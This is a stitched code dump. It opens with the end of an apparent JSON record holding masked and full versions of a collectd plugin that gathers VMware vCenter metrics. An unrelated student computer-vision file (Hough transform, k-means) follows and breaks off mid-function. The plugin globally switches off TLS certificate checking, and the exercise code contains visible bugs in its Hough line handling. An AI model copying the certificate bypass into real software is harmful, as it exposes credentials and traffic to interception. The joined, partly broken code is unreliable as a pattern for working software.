"step-4": "<mask token>\n\n\nclass Collector(object):\n\n def __init__(self, vcenters, username=None, password=None, verbose=False):\n \"\"\"\n Configuration to poll a vCenter cluster for performance data.\n\n :param list vcenters:\n A list of one or more vCenter server IPs or hostnames.\n :param str username:\n The username to use to authenticate against the vCenter cluster.\n :param str password:\n The password associated with the specified user.\n :param bool verbose: (optional)\n Whether to enable verbose logging.\n :param int sleep_time: (optional)\n Number of seconds to wait between polls.\n\n \"\"\"\n self.vcenters = vcenters\n self.username = username\n self.password = password\n self.verbose = verbose\n if COLLECTD_ENABLED:\n self.log = logging.getLogger()\n self.log.addHandler(CollectdHandler(self.verbose))\n else:\n logging.basicConfig(level=logging.DEBUG)\n self.log = logging.getLogger()\n\n def poll(self):\n \"\"\"\n Collect current performance information.\n\n \"\"\"\n stats = {}\n for vcenter in self.vcenters:\n stats[vcenter] = self.poll_vcenter(vcenter)\n return stats\n\n def poll_vcenter(self, vcenter):\n \"\"\"\n Open a connection to the specified vCenter server and begin gathering\n information about its datastores, datacenters, clusters, and hosts.\n\n :param str vcenter:\n The hostname or IP of a vCenter server.\n\n :returns:\n A dictionary containing information about the current state of\n objects managed by the specified vCenter.\n\n \"\"\"\n self.log.debug('polling %s@%s' % (self.username, vcenter))\n server = VIServer()\n try:\n server.connect(vcenter, self.username, self.password)\n except:\n self.log.exception('Failed to connect to %s' % (vcenter,))\n return {}\n stats = {'datastore': {}, 'datacenter': {}}\n for obj, name in server.get_datastores().items():\n ds_stats = self.poll_datastore(server, obj, name)\n stats['datastore'][name] = ds_stats\n datacenters = server.get_datacenters()\n for obj, name in datacenters.items():\n dc_stats = self.poll_datacenter(server, obj, name)\n stats['datacenter'][name] = dc_stats\n return stats\n\n def poll_datastore(self, server, obj, name):\n \"\"\"\n Gather metrics about a specific datastore.\n\n :param VIServer server:\n A valid connection to a vCenter server.\n :param MOR obj:\n Managed object for the datastore.\n :param str name:\n Name of the datastore.\n\n :returns:\n A dictionary with four keys: capacity, free, used, and usage. 
The\n capacity, free, and used space are measured in megabytes while the\n usage is a percentage.\n\n \"\"\"\n capacity = free = usage = 0\n try:\n self.log.debug('query datastore %s' % (name,))\n props = server._retrieve_properties_traversal(property_names=[\n 'name', 'summary.capacity', 'summary.freeSpace'], from_node\n =obj, obj_type='Datastore')\n for ps in props:\n for prop in ps.PropSet:\n pn, pv = prop.Name, prop.Val\n if pn == 'summary.capacity':\n capacity = pv / MB\n elif pn == 'summary.freeSpace':\n free = pv / MB\n except:\n self.log.exception('Failed to get datastore metrics')\n if capacity > 0:\n usage = (capacity - free) / float(capacity) * 100\n return {'capacity': capacity, 'free': free, 'used': capacity - free,\n 'usage': usage}\n\n def poll_datacenter(self, server, obj, name):\n \"\"\"\n Gather metrics about a specific datacenter.\n\n :param VIServer server:\n A valid connection to a vCenter server.\n :param MOR obj:\n Managed object for the datacenter.\n :param str name:\n Name of the datacenter.\n\n :returns:\n A dictionary with several keys describing the current state of the\n datacenter. This dictionary includes information about each cluster\n and host that is part of the specified datacenter.\n\n \"\"\"\n if '.' in name:\n name = name.split('.')[0]\n stats = self._poll_group('datacenter', server, obj, name)\n cluster_host_stats = self._poll_group('cluster', server, obj, name)\n for key, value in cluster_host_stats.items():\n if key not in stats:\n stats[key] = value\n elif isinstance(stats[key], dict):\n for c_key, c_value in value.items():\n stats[key][c_key] = c_value\n elif 'percent' in key:\n stats[key] = (stats[key] + value) / 2\n else:\n stats[key] += value\n return stats\n\n def poll_cluster(self, server, obj, name):\n \"\"\"\n Gather metrics about a specific cluster.\n\n :param VIServer server:\n A valid connection to a vCenter server.\n :param MOR obj:\n Managed object for the cluster.\n :param str name:\n Name of the cluster.\n\n :returns:\n A dictionary with several keys describing the current state of the\n cluster. This dictionary includes information about each host that\n is part of the specified cluster.\n\n \"\"\"\n return self._poll_group('cluster', server, obj, name)\n\n def _poll_group(self, group_type, server, obj, name):\n \"\"\"\n Generic metrics gathering for datacenters and clusters.\n\n :param VIServer server:\n A valid connection to a vCenter server.\n :param MOR obj:\n Managed object for a datacenter or cluster.\n :param str name:\n Name of a datacenter or cluster.\n\n :returns:\n A dictionary with several keys describing the current state of the\n datacenter/cluster. 
This dictionary includes information about each\n cluster and/or host that is part of the specified object.\n\n \"\"\"\n if group_type == 'datacenter':\n find_children = server.get_clusters\n poll_child = self.poll_cluster\n child_type = 'cluster'\n elif group_type == 'cluster':\n find_children = server.get_clusters\n find_children = server.get_hosts\n poll_child = self.poll_host\n child_type = 'host'\n self.log.debug('start querying %s: %s' % (group_type, name))\n children = find_children(obj)\n self.log.debug('finish querying %s: %s' % (group_type, name))\n cpu_total = cpu_usage = cpu_percent = 0\n mem_total = mem_usage = mem_percent = 0\n vms_total = vms_running = vms_stopped = 0\n child_stats = {}\n for child_obj, child_name in children.items():\n stats = poll_child(server, child_obj, child_name)\n child_stats[child_name] = stats\n cpu_total += stats['cpu_total']\n cpu_usage += stats['cpu_usage']\n mem_total += stats['mem_total']\n mem_usage += stats['mem_usage']\n vms_total += stats['vms_total']\n vms_running += stats['vms_running']\n vms_stopped += stats['vms_stopped']\n if cpu_total > 0:\n cpu_percent = cpu_usage / float(cpu_total) * 100\n if mem_total > 0:\n mem_percent = mem_usage / float(mem_total) * 100\n group_stats = {'cpu_total': cpu_total, 'cpu_usage': cpu_usage,\n 'cpu_percent': cpu_percent, 'mem_total': mem_total, 'mem_usage':\n mem_usage, 'mem_percent': mem_percent, 'vms_total': vms_total,\n 'vms_running': vms_running, 'vms_stopped': vms_stopped,\n child_type: child_stats}\n return group_stats\n\n def poll_host(self, server, obj, name):\n \"\"\"\n Gather metrics about a specific host.\n\n :param VIServer server:\n A valid connection to a vCenter server.\n :param MOR obj:\n Managed object for the host.\n :param str name:\n Name of the host.\n\n :returns:\n A dictionary with several keys describing the current state of the\n host, including CPU, memory, and virtual machine information.\n\n \"\"\"\n self.log.debug('found host: %s' % (name,))\n status = 0\n cpu_total = cpu_usage = cpu_percent = cpu_count = cpu_mhz_per_core = 0\n mem_total = mem_usage = mem_percent = 0\n vms_total = vms_running = vms_stopped = 0\n if '.' 
in name and name.count('.') != 3:\n name = name.split('.')[0]\n props = server._retrieve_properties_traversal(property_names=[\n 'name', 'summary.overallStatus',\n 'summary.quickStats.overallMemoryUsage',\n 'summary.quickStats.overallCpuUsage',\n 'summary.hardware.memorySize', 'summary.hardware.numCpuCores',\n 'summary.hardware.cpuMhz'], from_node=obj, obj_type='HostSystem')\n for prop_set in props:\n for prop in prop_set.PropSet:\n pn, pv = prop.Name, prop.Val\n if pn == 'summary.overallStatus':\n status = HOST_STATUS.index(pv)\n elif pn == 'summary.quickStats.overallMemoryUsage':\n mem_usage = pv\n elif pn == 'summary.quickStats.overallCpuUsage':\n cpu_usage = pv\n elif pn == 'summary.hardware.memorySize':\n mem_total = pv / MB\n elif pn == 'summary.hardware.numCpuCores':\n cpu_count = pv\n elif pn == 'summary.hardware.cpuMhz':\n cpu_mhz_per_core = pv\n vms_total = len(server.get_registered_vms(obj))\n vms_running = len(server.get_registered_vms(obj, status='poweredOn'))\n vms_stopped = len(server.get_registered_vms(obj, status='poweredOff'))\n cpu_total = cpu_count * cpu_mhz_per_core\n cpu_percent = cpu_usage / float(cpu_total) * 100\n mem_percent = mem_usage / float(mem_total) * 100\n stats = {'status': status, 'cpu_total': cpu_total, 'cpu_usage':\n cpu_usage, 'cpu_percent': cpu_percent, 'cpu_count': cpu_count,\n 'mem_total': mem_total, 'mem_usage': mem_usage, 'mem_percent':\n mem_percent, 'vms_total': vms_total, 'vms_running': vms_running,\n 'vms_stopped': vms_stopped}\n return stats\n\n\nclass CollectdCollector(Collector):\n \"\"\"\n Handle dispatching statistics to collectd.\n\n \"\"\"\n NAME = 'vCenter'\n\n def __init__(self, *args, **kwargs):\n super(CollectdCollector, self).__init__(*args, **kwargs)\n self.sleep_time = kwargs.get('sleep_time', 20)\n\n def configure(self, conf):\n \"\"\"\n Callback to configure the plugin based on collectd's settings.\n\n \"\"\"\n for node in conf.children:\n key = node.key\n val = node.values[0]\n if key == 'Vcenter':\n self.vcenters = val.split()\n elif key == 'Username':\n self.username = val\n elif key == 'Password':\n self.password = val\n elif key == 'Verbose':\n self.verbose = bool(val)\n elif key == 'Sleep':\n self.sleep_time = int(val)\n else:\n self.log.warn('Unknown config key: %s' % (key,))\n\n def read(self):\n \"\"\"\n Callback to send data back to collectd.\n\n \"\"\"\n self.log.debug('Beginning read callback')\n info = self.poll()\n if not info:\n self.log.warn('No data received')\n return\n\n def dispatch_host(name, data):\n \"\"\"\n Helper to reduce duplication\n\n \"\"\"\n for key, value in data.items():\n self.dispatch(name, 'host_%s' % (key,), name, value)\n for vcenter, data in info.items():\n for ds_name, ds_data in data['datastore'].items():\n for key, value in ds_data.items():\n self.dispatch(vcenter, 'ds_%s' % (key,), ds_name, value)\n for dc_name, dc_data in data['datacenter'].items():\n clusters = dc_data.pop('cluster', {})\n hosts = dc_data.pop('host', {})\n for key, value in dc_data.items():\n self.dispatch(vcenter, 'dc_%s' % (key,), dc_name, value)\n for c_name, c_data in clusters.items():\n c_hosts = c_data.pop('host', {})\n for key, value in c_data.items():\n o_type = 'cluster_%s' % (key,)\n self.dispatch(dc_name, o_type, c_name, value)\n for ch_name, ch_data in c_hosts.items():\n dispatch_host(ch_name, ch_data)\n for h_name, h_data in hosts.items():\n dispatch_host(h_name, h_data)\n time.sleep(self.sleep_time)\n\n def dispatch(self, host, obj_type, obj_instance, value):\n \"\"\"\n Helper to clean up metric 
sending.\n\n :param str host:\n The name of the host to which the metric belongs.\n :param str obj_type:\n The type of metric to report.\n :param str obj_instance:\n An instance to associate with the metric.\n :param int value:\n The value of the metric.\n\n \"\"\"\n val = collectd.Values(type='gauge', plugin=self.NAME, host=host)\n val.type_instance = obj_type\n val.plugin_instance = obj_instance\n val.values = [value]\n val.dispatch()\n\n\nclass CollectdHandler(logging.Handler):\n \"\"\"\n Expose collectd logger using standard Python logging.\n\n \"\"\"\n\n def __init__(self, verbose=False, *args, **kwargs):\n self.verbose = verbose\n super(CollectdHandler, self).__init__(*args, **kwargs)\n if COLLECTD_ENABLED:\n self._handler_map = {logging.CRITICAL: collectd.error, logging.\n ERROR: collectd.error, logging.WARN: collectd.warning,\n logging.INFO: collectd.info, logging.DEBUG: collectd.info}\n\n def emit(self, record):\n if not COLLECTD_ENABLED:\n return\n if record.level == logging.DEBUG and not self.verbose:\n return\n handler = self._handler_map[record.level]\n handler(record.getMessage())\n\n\n<mask token>\n",
"step-5": "# collectd-vcenter - vcenter.py\n#\n# Author : Loic Lambiel @ exoscale\n# Contributor : Josh VanderLinden\n# Description : This is a collectd python module to gather stats from Vmware\n# vcenter\n\nimport logging\nimport ssl\nimport time\n\nfrom pysphere import VIServer\n\ntry:\n import collectd\n COLLECTD_ENABLED = True\nexcept ImportError:\n COLLECTD_ENABLED = False\n\ntry:\n _create_unverified_https_context = ssl._create_unverified_context\nexcept AttributeError:\n # Legacy Python that doesn't verify HTTPS certificates by default\n pass\nelse:\n # Handle target environment that doesn't support HTTPS verification\n ssl._create_default_https_context = _create_unverified_https_context\n\nMB = 1024 ** 2\nHOST_STATUS = ('green', 'gray', 'yellow', 'red')\n\n\nclass Collector(object):\n\n def __init__(self, vcenters, username=None, password=None,\n verbose=False):\n \"\"\"\n Configuration to poll a vCenter cluster for performance data.\n\n :param list vcenters:\n A list of one or more vCenter server IPs or hostnames.\n :param str username:\n The username to use to authenticate against the vCenter cluster.\n :param str password:\n The password associated with the specified user.\n :param bool verbose: (optional)\n Whether to enable verbose logging.\n :param int sleep_time: (optional)\n Number of seconds to wait between polls.\n\n \"\"\"\n\n self.vcenters = vcenters\n self.username = username\n self.password = password\n self.verbose = verbose\n\n if COLLECTD_ENABLED:\n self.log = logging.getLogger()\n self.log.addHandler(CollectdHandler(self.verbose))\n else:\n logging.basicConfig(level=logging.DEBUG)\n self.log = logging.getLogger()\n\n def poll(self):\n \"\"\"\n Collect current performance information.\n\n \"\"\"\n\n stats = {}\n for vcenter in self.vcenters:\n stats[vcenter] = self.poll_vcenter(vcenter)\n\n return stats\n\n def poll_vcenter(self, vcenter):\n \"\"\"\n Open a connection to the specified vCenter server and begin gathering\n information about its datastores, datacenters, clusters, and hosts.\n\n :param str vcenter:\n The hostname or IP of a vCenter server.\n\n :returns:\n A dictionary containing information about the current state of\n objects managed by the specified vCenter.\n\n \"\"\"\n\n self.log.debug('polling %s@%s' % (self.username, vcenter))\n server = VIServer()\n\n try:\n server.connect(vcenter, self.username, self.password)\n except:\n self.log.exception('Failed to connect to %s' % (vcenter,))\n return {}\n\n stats = {\n 'datastore': {},\n 'datacenter': {},\n }\n\n for obj, name in server.get_datastores().items():\n ds_stats = self.poll_datastore(server, obj, name)\n stats['datastore'][name] = ds_stats\n\n datacenters = server.get_datacenters()\n for obj, name in datacenters.items():\n dc_stats = self.poll_datacenter(server, obj, name)\n stats['datacenter'][name] = dc_stats\n\n return stats\n\n def poll_datastore(self, server, obj, name):\n \"\"\"\n Gather metrics about a specific datastore.\n\n :param VIServer server:\n A valid connection to a vCenter server.\n :param MOR obj:\n Managed object for the datastore.\n :param str name:\n Name of the datastore.\n\n :returns:\n A dictionary with four keys: capacity, free, used, and usage. 
The\n capacity, free, and used space are measured in megabytes while the\n usage is a percentage.\n\n \"\"\"\n\n capacity = free = usage = 0\n\n try:\n self.log.debug('query datastore %s' % (name,))\n props = server._retrieve_properties_traversal(property_names=[\n 'name',\n 'summary.capacity',\n 'summary.freeSpace',\n ], from_node=obj, obj_type='Datastore')\n\n for ps in props:\n for prop in ps.PropSet:\n pn, pv = prop.Name, prop.Val\n if pn == 'summary.capacity':\n capacity = pv / MB\n elif pn == 'summary.freeSpace':\n free = pv / MB\n except:\n self.log.exception('Failed to get datastore metrics')\n\n if capacity > 0:\n usage = (capacity - free) / float(capacity) * 100\n\n return {\n 'capacity': capacity,\n 'free': free,\n 'used': capacity - free,\n 'usage': usage,\n }\n\n def poll_datacenter(self, server, obj, name):\n \"\"\"\n Gather metrics about a specific datacenter.\n\n :param VIServer server:\n A valid connection to a vCenter server.\n :param MOR obj:\n Managed object for the datacenter.\n :param str name:\n Name of the datacenter.\n\n :returns:\n A dictionary with several keys describing the current state of the\n datacenter. This dictionary includes information about each cluster\n and host that is part of the specified datacenter.\n\n \"\"\"\n\n if '.' in name:\n name = name.split('.')[0]\n\n stats = self._poll_group('datacenter', server, obj, name)\n\n cluster_host_stats = self._poll_group('cluster', server, obj, name)\n for key, value in cluster_host_stats.items():\n if key not in stats:\n stats[key] = value\n elif isinstance(stats[key], dict):\n for c_key, c_value in value.items():\n stats[key][c_key] = c_value\n else:\n if 'percent' in key:\n stats[key] = (stats[key] + value) / 2\n else:\n stats[key] += value\n\n return stats\n\n def poll_cluster(self, server, obj, name):\n \"\"\"\n Gather metrics about a specific cluster.\n\n :param VIServer server:\n A valid connection to a vCenter server.\n :param MOR obj:\n Managed object for the cluster.\n :param str name:\n Name of the cluster.\n\n :returns:\n A dictionary with several keys describing the current state of the\n cluster. This dictionary includes information about each host that\n is part of the specified cluster.\n\n \"\"\"\n\n return self._poll_group('cluster', server, obj, name)\n\n def _poll_group(self, group_type, server, obj, name):\n \"\"\"\n Generic metrics gathering for datacenters and clusters.\n\n :param VIServer server:\n A valid connection to a vCenter server.\n :param MOR obj:\n Managed object for a datacenter or cluster.\n :param str name:\n Name of a datacenter or cluster.\n\n :returns:\n A dictionary with several keys describing the current state of the\n datacenter/cluster. 
This dictionary includes information about each\n cluster and/or host that is part of the specified object.\n\n \"\"\"\n\n # change collection behavior based on the type of group we're dealing\n # with\n if group_type == 'datacenter':\n # find each cluster in the datacenter\n find_children = server.get_clusters\n poll_child = self.poll_cluster\n child_type = 'cluster'\n elif group_type == 'cluster':\n # find each host in the datacenter or cluster\n find_children = server.get_clusters\n find_children = server.get_hosts\n poll_child = self.poll_host\n child_type = 'host'\n\n self.log.debug('start querying %s: %s' % (group_type, name))\n children = find_children(obj)\n self.log.debug('finish querying %s: %s' % (group_type, name))\n\n # initialize some metrics\n cpu_total = cpu_usage = cpu_percent = 0\n mem_total = mem_usage = mem_percent = 0\n vms_total = vms_running = vms_stopped = 0\n child_stats = {}\n\n # iterate over each child node in this object group\n for child_obj, child_name in children.items():\n stats = poll_child(server, child_obj, child_name)\n child_stats[child_name] = stats\n\n # aggregate data from each child to the top level\n cpu_total += stats['cpu_total']\n cpu_usage += stats['cpu_usage']\n\n mem_total += stats['mem_total']\n mem_usage += stats['mem_usage']\n\n vms_total += stats['vms_total']\n vms_running += stats['vms_running']\n vms_stopped += stats['vms_stopped']\n\n # recalculate percentages\n if cpu_total > 0:\n cpu_percent = cpu_usage / float(cpu_total) * 100\n\n if mem_total > 0:\n mem_percent = mem_usage / float(mem_total) * 100\n\n # return the current metrics for this group\n group_stats = {\n 'cpu_total': cpu_total,\n 'cpu_usage': cpu_usage,\n 'cpu_percent': cpu_percent,\n 'mem_total': mem_total,\n 'mem_usage': mem_usage,\n 'mem_percent': mem_percent,\n 'vms_total': vms_total,\n 'vms_running': vms_running,\n 'vms_stopped': vms_stopped,\n child_type: child_stats,\n }\n\n return group_stats\n\n def poll_host(self, server, obj, name):\n \"\"\"\n Gather metrics about a specific host.\n\n :param VIServer server:\n A valid connection to a vCenter server.\n :param MOR obj:\n Managed object for the host.\n :param str name:\n Name of the host.\n\n :returns:\n A dictionary with several keys describing the current state of the\n host, including CPU, memory, and virtual machine information.\n\n \"\"\"\n\n self.log.debug('found host: %s' % (name,))\n\n status = 0\n cpu_total = cpu_usage = cpu_percent = cpu_count = cpu_mhz_per_core = 0\n mem_total = mem_usage = mem_percent = 0\n vms_total = vms_running = vms_stopped = 0\n\n if '.' 
in name and name.count('.') != 3:\n name = name.split('.')[0]\n\n props = server._retrieve_properties_traversal(property_names=[\n 'name',\n 'summary.overallStatus',\n 'summary.quickStats.overallMemoryUsage',\n 'summary.quickStats.overallCpuUsage',\n 'summary.hardware.memorySize',\n 'summary.hardware.numCpuCores',\n 'summary.hardware.cpuMhz',\n ], from_node=obj, obj_type='HostSystem')\n\n for prop_set in props:\n for prop in prop_set.PropSet:\n pn, pv = prop.Name, prop.Val\n\n if pn == 'summary.overallStatus':\n status = HOST_STATUS.index(pv)\n elif pn == 'summary.quickStats.overallMemoryUsage':\n mem_usage = pv\n elif pn == 'summary.quickStats.overallCpuUsage':\n cpu_usage = pv\n elif pn == 'summary.hardware.memorySize':\n mem_total = pv / MB\n elif pn == 'summary.hardware.numCpuCores':\n cpu_count = pv\n elif pn == 'summary.hardware.cpuMhz':\n cpu_mhz_per_core = pv\n\n vms_total = len(server.get_registered_vms(obj))\n vms_running = len(server.get_registered_vms(obj, status='poweredOn'))\n vms_stopped = len(server.get_registered_vms(obj, status='poweredOff'))\n\n cpu_total = cpu_count * cpu_mhz_per_core\n cpu_percent = cpu_usage / float(cpu_total) * 100\n mem_percent = mem_usage / float(mem_total) * 100\n\n stats = {\n 'status': status,\n 'cpu_total': cpu_total,\n 'cpu_usage': cpu_usage,\n 'cpu_percent': cpu_percent,\n 'cpu_count': cpu_count,\n 'mem_total': mem_total,\n 'mem_usage': mem_usage,\n 'mem_percent': mem_percent,\n 'vms_total': vms_total,\n 'vms_running': vms_running,\n 'vms_stopped': vms_stopped,\n }\n\n return stats\n\n\nclass CollectdCollector(Collector):\n \"\"\"\n Handle dispatching statistics to collectd.\n\n \"\"\"\n\n NAME = 'vCenter'\n\n def __init__(self, *args, **kwargs):\n super(CollectdCollector, self).__init__(*args, **kwargs)\n\n self.sleep_time = kwargs.get('sleep_time', 20)\n\n def configure(self, conf):\n \"\"\"\n Callback to configure the plugin based on collectd's settings.\n\n \"\"\"\n\n for node in conf.children:\n key = node.key\n val = node.values[0]\n if key == 'Vcenter':\n self.vcenters = val.split()\n elif key == 'Username':\n self.username = val\n elif key == 'Password':\n self.password = val\n elif key == 'Verbose':\n self.verbose = bool(val)\n elif key == 'Sleep':\n self.sleep_time = int(val)\n else:\n self.log.warn('Unknown config key: %s' % (key,))\n\n def read(self):\n \"\"\"\n Callback to send data back to collectd.\n\n \"\"\"\n\n self.log.debug('Beginning read callback')\n info = self.poll()\n\n if not info:\n self.log.warn('No data received')\n return\n\n def dispatch_host(name, data):\n \"\"\"\n Helper to reduce duplication\n\n \"\"\"\n\n for key, value in data.items():\n self.dispatch(name, 'host_%s' % (key,), name, value)\n\n # report information for all vCenter servers\n for vcenter, data in info.items():\n # report datastore information\n for ds_name, ds_data in data['datastore'].items():\n for key, value in ds_data.items():\n self.dispatch(vcenter, 'ds_%s' % (key,), ds_name, value)\n\n # report datacenter information\n for dc_name, dc_data in data['datacenter'].items():\n # extract any cluster and host information for later processing\n clusters = dc_data.pop('cluster', {})\n hosts = dc_data.pop('host', {})\n\n for key, value in dc_data.items():\n self.dispatch(vcenter, 'dc_%s' % (key,), dc_name, value)\n\n # report cluster information\n for c_name, c_data in clusters.items():\n c_hosts = c_data.pop('host', {})\n\n for key, value in c_data.items():\n o_type = 'cluster_%s' % (key,)\n self.dispatch(dc_name, o_type, c_name, value)\n\n for 
ch_name, ch_data in c_hosts.items():\n dispatch_host(ch_name, ch_data)\n\n # report host information\n for h_name, h_data in hosts.items():\n dispatch_host(h_name, h_data)\n\n time.sleep(self.sleep_time)\n\n def dispatch(self, host, obj_type, obj_instance, value):\n \"\"\"\n Helper to clean up metric sending.\n\n :param str host:\n The name of the host to which the metric belongs.\n :param str obj_type:\n The type of metric to report.\n :param str obj_instance:\n An instance to associate with the metric.\n :param int value:\n The value of the metric.\n\n \"\"\"\n\n val = collectd.Values(type='gauge', plugin=self.NAME, host=host)\n val.type_instance = obj_type\n val.plugin_instance = obj_instance\n val.values = [value]\n val.dispatch()\n\n\nclass CollectdHandler(logging.Handler):\n \"\"\"\n Expose collectd logger using standard Python logging.\n\n \"\"\"\n\n def __init__(self, verbose=False, *args, **kwargs):\n self.verbose = verbose\n super(CollectdHandler, self).__init__(*args, **kwargs)\n\n if COLLECTD_ENABLED:\n self._handler_map = {\n logging.CRITICAL: collectd.error,\n logging.ERROR: collectd.error,\n logging.WARN: collectd.warning,\n logging.INFO: collectd.info,\n logging.DEBUG: collectd.info,\n }\n\n def emit(self, record):\n if not COLLECTD_ENABLED:\n return\n\n if record.level == logging.DEBUG and not self.verbose:\n return\n\n handler = self._handler_map[record.level]\n handler(record.getMessage())\n\n\nif COLLECTD_ENABLED:\n instance = CollectdCollector([])\n\n collectd.register_config(instance.configure)\n collectd.register_read(instance.read)\n",
"step-ids": [
11,
13,
19,
20,
24
]
}
|
[
11,
13,
19,
20,
24
] |
import numpy as np
import cv2 as cv
import random
import time
random.seed(0)
def displayImage(winName, img):
""" Helper function to display image
arguments:
winName -- Name of display window
img -- Source Image
"""
cv.imshow(winName, img)
cv.waitKey(0)
##############################################
# Task 1 ##########################
##############################################
def task_1_a():
print("Task 1 (a) ...")
img = cv.imread('../images/shapes.png')
gray_image = cv.cvtColor(img,cv.COLOR_BGR2GRAY)
edges = cv.Canny( gray_image,50,150)
#cv.imshow('edges', edges)
detected_lines = cv.HoughLines(edges,1,np.pi/180,10)
#print (detected_lines)
    for line in detected_lines:
        rho, theta = line[0]  # cv.HoughLines returns an (N, 1, 2) array in OpenCV 3+, so iterate over all lines
a = np.cos(theta)
b = np.sin(theta)
x0 = a*rho
y0 = b*rho
x1 = int(x0 + 1000*(-b))
y1 = int(y0 + 1000*(a))
x2 = int(x0 - 1000*(-b))
y2 = int(y0 - 1000*(a))
cv.line(img,(x1,y1),(x2,y2),(0,255,0),1)
displayImage('1_a Hough transform - detected lines ', img)
def myHoughLines(img_edges, d_resolution, theta_step_sz, threshold):
"""
Your implementation of HoughLines
:param img_edges: single-channel binary source image (e.g: edges)
:param d_resolution: the resolution for the distance parameter
:param theta_step_sz: the resolution for the angle parameter
:param threshold: minimum number of votes to consider a detection
    :return: list of detected lines as (theta, d) pairs and the accumulator
"""
accumulator = np.zeros((int(180 / theta_step_sz), int(np.linalg.norm(img_edges.shape) / d_resolution)))
    rho = int(np.linalg.norm(img_edges.shape) / d_resolution)    # number of distance bins
    theta_array = np.deg2rad(np.arange(-90, 90, theta_step_sz))  # sampled angles in radians
    rows, cols = img_edges.shape
    img_edges_copy = img_edges.copy()
    detected_lines = []
    for x in range(rows):
        for y in range(cols):
if img_edges_copy[x,y]:
for index_theta in range(len(theta_array)):
#theta_value = theta * index_theta
rho_value = x*np.cos(theta_array[index_theta]) + y*np.sin(theta_array[index_theta])
# to avoid negative index
index_rho = int (rho_value + rho/2)
# to avoid index overflow
if (index_rho >= rho) : continue
#print('rhoindex')
#print (index_rho)
accumulator[index_theta, index_rho] += 1
if accumulator[index_theta, index_rho] >= threshold:
detected_lines.append((theta_array[index_theta], rho_value))
return detected_lines, accumulator
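# peaks_from_accumulator is NOT part of the original submission. Because
# myHoughLines appends a line every time an accumulator cell reaches the
# threshold, the same line can be reported repeatedly; a common alternative,
# sketched here with the same parameterization and the same "+ rho/2" offset
# used while voting, is to finish voting and then read peaks off the result:
def peaks_from_accumulator(accumulator, theta_step_sz, threshold):
    """Return (theta, d) pairs for every accumulator cell with enough votes."""
    theta_array = np.deg2rad(np.arange(-90, 90, theta_step_sz))
    rho_bins = accumulator.shape[1]
    peaks = np.argwhere(accumulator >= threshold)  # rows are (theta_idx, rho_idx)
    return [(theta_array[t], r - rho_bins / 2) for t, r in peaks]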
def task_1_b():
print("Task 1 (b) ...")
img = cv.imread('../images/shapes.png')
img_gray = cv.cvtColor(img,cv.COLOR_BGR2GRAY) # convert the image into grayscale
edges = cv.Canny( img_gray,50,150) # detect the edges
detected_lines, accumulator = myHoughLines(edges, 1, 2, 50)
cv.imshow("1_b Accumulator myHoughLines", accumulator)
#print (len(detected_lines))
for theta,rho in detected_lines:
a = np.cos(theta)
b = np.sin(theta)
x0 = a*rho
y0 = b*rho
x1 = int(x0 + 1000*(-b))
y1 = int(y0 + 1000*(a))
x2 = int(x0 - 1000*(-b))
y2 = int(y0 - 1000*(a))
cv.line(img,(x1,y1),(x2,y2),(0,0,255),2)
displayImage('1_b Hough transform - own implementation', img)
##############################################
# Task 2 ##########################
##############################################
def task_2():
print("Task 2 ...")
img = cv.imread('../images/line.png')
img_gray = cv.cvtColor(img,cv.COLOR_BGR2GRAY) # convert the image into grayscale
edges = cv.Canny( img_gray,50,150,apertureSize = 3) # detect the edges
theta_res = 1 # set the resolution of theta
d_res = 1 # set the distance resolution
_, accumulator = myHoughLines(edges, d_res, theta_res, 50)
displayImage("task_2_ accumulator - mean shift", accumulator)
#mean_shift(accumulator)
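# The commented-out call above refers to a mean_shift routine that is never
# defined in this file. The sketch below is NOT part of the original
# submission: it is a minimal, assumed mean-shift peak search over the Hough
# accumulator; the window size, tolerance and the argmax initialization are
# arbitrary choices, not the author's.
def mean_shift(accumulator, window_size=5, tolerance=1e-3, max_iter=100):
    """Shift a window towards the weighted mean of the votes inside it and
    return the (row, col) accumulator position it converges to."""
    rows, cols = accumulator.shape
    # start from the strongest cell as an (assumed) reasonable initialization
    pos = np.array(np.unravel_index(np.argmax(accumulator), accumulator.shape),
                   dtype=float)
    for _ in range(max_iter):
        r0 = int(max(pos[0] - window_size, 0))
        r1 = int(min(pos[0] + window_size + 1, rows))
        c0 = int(max(pos[1] - window_size, 0))
        c1 = int(min(pos[1] + window_size + 1, cols))
        window = accumulator[r0:r1, c0:c1]
        total = window.sum()
        if total == 0:
            break
        # weighted mean of the vote positions inside the window
        rr, cc = np.mgrid[r0:r1, c0:c1]
        new_pos = np.array([(rr * window).sum(), (cc * window).sum()]) / total
        if np.linalg.norm(new_pos - pos) < tolerance:
            pos = new_pos
            break
        pos = new_pos
    return pos
# Assumed usage in task_2: peak = mean_shift(accumulator); the returned
# (row, col) maps back to a (theta, d) pair via the resolutions used in myHoughLines.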
##############################################
# Task 3 ##########################
##############################################
def myKmeans(data, k, useDist = False):
"""
:return: centers and list of indices that store the cluster index for each data point
"""
centers = np.zeros((k, 1), dtype = int)
index = np.zeros(data.shape[0], dtype=int)
clusters = [[] for i in range(k)]
threshold = 0
if data.shape[1] > 1:
threshold = 20
print('Threshold value = ' + str(threshold))
print('-------------------------------------------------')
# initialize centers using some random points from data
# ....
    # Randomly initialize centers by picking random data indices (duplicate picks are possible)
for idx in range(centers.shape[0]):
randIdx = random.choice(range(data.shape[0]))
centers[idx] = randIdx
    # Randomly initialize centers with distinct pixel values. Still buggy
# start_time = time.time()
# indices = np.arange(0,data.shape[0]).tolist()
# for idx in range(centers.shape[0]):
# if len(indices) > 0:
# randIdx = random.choice(indices)
# delIndices = np.unique(np.where((data*255).astype('uint8') == (data[randIdx]*255).astype('uint8'))).tolist()
# if len(delIndices) > 0:
# for i in range(len(delIndices)):
# try:
# indices.remove(delIndices[i])
# except ValueError:
# print('Value not found')
# # print('Indices removed')
# else:
# randIdx = random.choice(range(data.shape[0]))
# centers[idx] = randIdx
# end_time = time.time()
# print('Center no' + str(idx+1) + ' added in ' + str(round(end_time - start_time,5)) + ' seconds')
# To debug uncomment the following lines
# Sometimes the pixel values of two cluster centroids are too close
# Therefore, one of the clusters might end up not having any points at all
# print('Initial centers:\n' + str(centers))
# print('-------------------------------------------------')
# centerVals = data[centers]
# print('Pixel Values of initial centers:\n' + str(centerVals))
# print('-------------------------------------------------')
convergence = False
iterationNo = 0
start_time = time.time()
    while not convergence:
        # assign each point to the cluster of closest center;
        # rebuild the membership lists each iteration so stale assignments
        # from previous passes do not distort the updated means
        clusters = [[] for i in range(k)]
        euclDist = 0
centerVals = data[centers]
for idx in range(data.shape[0]):
if useDist:
                # the data is a flattened vector, so spatial position is
                # approximated by the flat index; dividing by the number of
